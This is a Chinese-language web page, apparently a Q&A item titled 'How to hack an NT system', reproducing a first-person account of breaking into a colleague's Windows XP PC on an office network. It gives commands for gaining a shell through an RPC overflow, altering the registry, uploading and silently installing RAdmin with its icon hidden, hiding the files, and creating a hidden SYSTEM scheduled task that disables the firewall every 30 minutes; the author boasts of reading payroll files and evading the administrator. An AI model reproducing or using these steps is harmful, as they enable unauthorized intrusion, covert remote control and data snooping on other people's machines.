当前位置 - 股票行情交易網 - 財經資訊 - 如何入侵NT系統

如何入侵NT系統

建議不要亂來,

妳可以通過135入侵,這是XP系統最多的漏洞,很容易.

還有就是有壹篇成功過的例子

參考看看

我先打開命令提示符,用 ping 命令去ping 它,Reply from 192.168.16.4: bytes=32 time<1ms TTL=128,說明對方沒有防火墻,這樣或許有可能入侵。下壹步,我使用了X-SCAN 3.2對它進行了詳細掃描,對方電腦的操作系統是XP,大家知道XP系統是相當安全的,在壹些黑客論壇討論的關於入侵XP的話題也是比較多的,入侵這樣的系統方法只有兩種,壹是采用釣魚的方法,這是壹種被動的方式讓對方中木馬來控制它。第二種方法就是如果對方有比較嚴重的漏洞,如RPC溢出。這樣的話,用溢出程序溢出它,然後再上傳控制程序進行控制。掃描結果確實讓我高興了壹陣,對方電腦有大量的漏洞,其中壹個比較有名的就是沖擊波利用的RPC漏洞,這個漏洞相當出名了,03年的時候曾席卷全球。知道了它有這個漏洞,下壹步就要找溢出程序,這讓我忙活了好壹陣時間,因為有的溢出程序對這臺電腦好像無效。這些工具的名稱我都記不起來了,反正有好幾個。最後找到了壹個溢出程序XP.EXE,這個程序終於溢出了那臺電腦。得到了個CMDSHELL。這算是壹個小小的勝利吧。

得到了CMDSHELL,我該怎樣給它上傳控制程序呢?我想了壹會兒,終於靈感來了,我和它在壹個局域網,用***享上傳最方便了。於是打開網上鄰居,查看工作組計算機,找到這臺電腦,雙擊,進不去,提示信息我記不清了,據我分析可能是對方這臺電腦沒有運行網絡安裝向導,因為是XP系統,所以要用***享傳輸文件,必須要運行這個向導不可,運行這個向導作用就是配置壹個本地安全策略,妳可以打開“控制面板—管理工具—本地安全策略”,展開“本地策略”—“用戶權利指派”。在右邊有壹個安全策略—“拒絕從網絡訪問這臺計算機”。我想對方的電腦中相應的這條策略裏,肯定設置有GUEST這個用戶的,這就是為什麽我打不開它的***享的原因,因為***享訪問默認是以這個GEUST用戶登錄的,因為它的安全設置不允許GUEST從網絡訪問,所以我才訪問不了它的***享。因為XP 默認的***享模式是簡單文件***享。這與WIN2000系統不同,如果是WIN2000系統,妳在知道管理員密碼的情況下,可以用命令net use IPipc$ "密碼" /user:用戶名 建立與對方的ipc$連接,隨之而來的就是copy 木馬程序 ipd$這樣的命令上傳木馬了。XP就不能這樣子了,妳即使知道它的管理員密碼用上面的命令與不能建立ipc$連接。這就是為什麽XP比2000系統安全的地方所在。下面我要作的就是要修改XP的***享模式為2000的***享模式。方法如下:在溢出獲得的CMDSHELL下,鍵入命令:

echo Windows Registry Editor Version 5.00 >c:123.reg

echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa] >>c:123.reg

echo. >>c:123.reg

echo "forceguest"=dword:00000000 >>c:123.reg

regedit /e c:123.reg

等打完這幾條命令後,對方XP的***享模式就已經與2000的相同了。我來解釋壹下這幾條命令的含意,echo Windows Registry Editor Version 5.00 >c:123.reg這條命令是將Windows Registry Editor Version 5.00這幾個字符保存到c:123.reg文件裏。大家需要註意壹下第壹句的> 和後面幾句的>>這是有區別的,>字符是覆蓋式的,>>是追加式的,第三句的echo. >>c:123.reg命令是追加壹個空白行,這句挺重要,如果不加這句是不能成功的,妳可以隨便打開壹個註冊表文件看壹下,格式就是這樣的,第二行是空著的。這壹點壹定要註意。執行完前四條命令後就在對方C盤下生成壹個123.reg文件,內容如下:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]

"forceguest"=dword:00000000

第五條命令是將這個REG文件導入到註冊表中。這樣執行完這五條命令後,我就可以像操作2000系統壹樣去用ipc$控制了。下壹步,上傳控制程序。我選擇的是RADMIN2.0的服務程序,有人問這個安裝需要到圖形界面下,我說不用這麽費事,在CMDSHELL下壹樣可以安裝。安裝前我們需要先準備壹下,首先生成壹個REG文件,文件名:aaa.reg 內容如下:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters]

"DisableTrayIcon"=hex:01,00,00,00

作用就是使生成的服務端程序能夠隱藏通知欄裏的圖標,我們都知道正常安裝RADMIN服務端程序後,在通知欄裏是有壹個小圖標的,我們要入侵人家,當然要把這個小圖標去掉,不然是會被發現的。接著生成壹個BAT文件,我命名為aaa.bat,內容如下:

r_server /install /silence

r_server.exe /port:2233 /pass:1 /save /silence

regedit.exe /s aaa.reg

net start r_server

這些命令是安裝命令,設置連接端口為:2233 密碼是:1 隱藏安裝界面的方式安裝 然後就是將aaa.reg導入註冊表,啟動r_server服務。

準備工作作好後,就要上傳文件了,壹***需上傳4個文件,aaa.reg aaa.bat r_server.exe admdll.dll 後兩個文件是RADMIN安裝目錄下的,在安裝了RADMIN2.0客戶端後,安裝目錄裏就有這兩個文件。我先建立ipc$連接 net use 192.168.16.4ipc$ "" /user:administrator 提示:命令成功完成。接著:

copy r_server 192.168.1.4admin$system32

copy aaa.bat 192.168.1.4admin$system32

copy aaa.reg 192.168.1.4admin$system32

copy admdll.dll 192.168.1.4admin$system32

然後再進入溢出得到的CMDSHELL下鍵入:

attrib +s +h +r c:windowssystem32r_server.exe

attrib +s +h +r c:windowssystem32admdll.exe

attrib +s +h +r c:windowssystem32aaa.bat

attrib +s +h +r c:windowssystem32aaa.reg

這些命令是將這4個文件設置成系統隱藏只讀文件,不容易被對方管理員發現。

下壹步就是運行aaa.bat了,就這麽簡單,運行成功後,我用radmin2.0客戶端設置了壹下連接參數,端口改成2233,連接成功,密碼是1,成功地看到了對方的屏幕。呵呵,成功了,從有入侵的想法到入侵成功進行控制,只用了短短的4天時間。

進入後看到對方電腦上正在玩QQ保皇遊戲,不過我也犯了個錯誤我給它新建了個管理用戶,原先是打算用於ipc$連接用的,可我上傳RADMIN控制後忘記刪掉了,我在溢出的CMDSHELL 下不小心鍵入了命令EXIT,結果對方電腦出現了倒計時關機的界面,我也沒有及時處理掉,我當時要是用RADMIN的CMD功能,鍵入命令 shutdown -A就可以取消這個倒計時關機的界面,可當時我也沒有及時處理,導致對方電腦重啟了,重啟後我估計對方管理員看到了我新建的用戶了,後來我用RADMIN 遠程查看時,也覺得這個新建用戶太招搖了,用戶名就是ip$ ,圖標是個大紅的花朵。

下午的時候我發現那臺電腦的管理員請了位高手來助陣了,因為我們這個局域網中的各臺電腦都通過我們辦公室裏的那臺電腦連接到互聯網上,所以,那位高手先到我們辦公室電腦上查看了壹番沒有發現問題後,他將原先安裝的江民換成了卡巴了,我估計他認為攻擊是來自互聯網上,豈不知黑客就在他眼皮底下,嘿嘿。。。。那位高手又給被我控制了的電腦上安裝了卡巴,原先的殺毒軟件是諾頓,對WINDOWS也進行了更新,可這些作法都晚了,因為我已經控制妳了,再打補丁也無用了。經過那位高手壹番檢查與修補後,我的後門依然存在著,看來那位高手水平也不怎麽樣。我給它開放的ipc$功能,他也沒發現。也許他只認為是壹次簡單的病毒攻擊,而掉以輕心了,而不知他的壹舉壹動都在我的監視之下。哈哈。。。

接下來的工作對我來說就比較簡單了,給它開telnet服務器,開“遠程桌面”這個我采用的是圖形的方式進行操作的,中午下班後我等這臺計算機管理員走後,用RADMIN登錄進去進行了壹些設置工作。後來也通過RADMIN的文件管理功能翻看了這臺電腦上的文件,有壹些財務報表,工資表之類的東西,這些對我來看沒什麽大的吸引力。不過我看到了我們集團老總的工資,每月壹萬多塊錢呢!!好黑啊。。。這麽多,我工資只有區區幾百塊,真是太不公平了,憤憤不平中。。。。

後來壹次通過RADMIN操作對方的電腦時不小心被管理員發現了,我想對方的管理員也很感到意外, windows的補丁打上了,還裝了強悍的卡巴,還是搞不定黑客!!哈哈,因為卡巴不是殺RADMIN的。後來對方那個管理員啟用了局域網“本地連接”中的防火墻功能,這樣我無法連接它的電腦了。因為RADMIN是正向連接的,所以在對方開防火墻的情況下是無法使用的。有壹次下午下班後我無意地ping 了壹下這臺電腦的IP,居然有返回。說明對方防火墻關閉了,我馬上用RADMIN連接,居然成功。我暈。。。原來對方只開了防火墻,並沒有發現這個明顯的後門。我想開防火墻也是那位電腦高手給搞的,依那個管理員的水平是想不到這個辦法的。不過telnet服務器給關閉了,3389遠程桌面也給關了,***享模式也被修改回了原先的樣子。看來那位高手也是發現了壹些漏洞並補上了,但是那個後門,他卻沒有發現,這就給我創造了第二次入侵的機會。他有政策我有對策,他可以開防火墻,我可以給他關掉,有人問要是再被管理員開啟了防火墻,那豈不是沒得玩了。哈哈。。。我下面給出壹個我自己研究出來的獨門密方,保證百病!哈哈。。。。

我的方法是創建壹個隱藏的計劃任務。讓這個計劃任務每隔半個小時殺除壹遍防火墻,這樣即使對方管理員打開防火墻也起不了什麽作用。方法如下:先建壹個批處理文件abc.bat,放在c:windowssystem32目錄下,內容如下:

net stop sharedaccess

當然也可以附加點別的,比如說妳想半小時殺除壹遍天網防火墻,可以再加上下面的命令:

taskkill /IM rfw.exe /f

如果想使***享模式是高級***享模式,可以再加上下面的命令:

regedit /e c:windowssystem32abc.reg

當然這需要事先上傳壹個abc.reg到它的c:windowssystem32目錄下,內容如下:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]

"forceguest"=dword:00000000

下面我說壹下創建隱藏計劃任務的方法:

在對方電腦的CMDSHELL下鍵入命令:

schtasks /create /tn "常駐" /tr c:windowssystem32abc.bat /sc minute /mo 30 /ru "system"

這樣就在對方電腦上建立了壹個以SYSTEM權限運行的計劃任務,這個計劃任務每隔30分鐘運行壹次c: windowssystem32abc.bat,功能嘛,就是根據abc.bat裏面的命令行決定了,可以說這個新發現是相當厲害的,利用的巧妙,功能可以相當強大。如果只有這樣還不能達到隱藏的要求,妳打開控制面板—任務計劃,仍然可以發現它的存在。好的,下面說說隱藏它的方法。還是進入 CMDSHELL中。鍵入命令attrib +h c:windowstasks常駐.job回車後,妳再到控制面板的任務計劃中看壹下是不是以前的任務消失了。這只是表面消失,實際是它還是存在的。妳可以在CMDSHELL下鍵入命令:schtasks查看。這樣不管對方管理員怎樣修改設置,每隔半小時就又會補修改回來。它想擺脫我的控制可說是難上加難了。哈哈。。。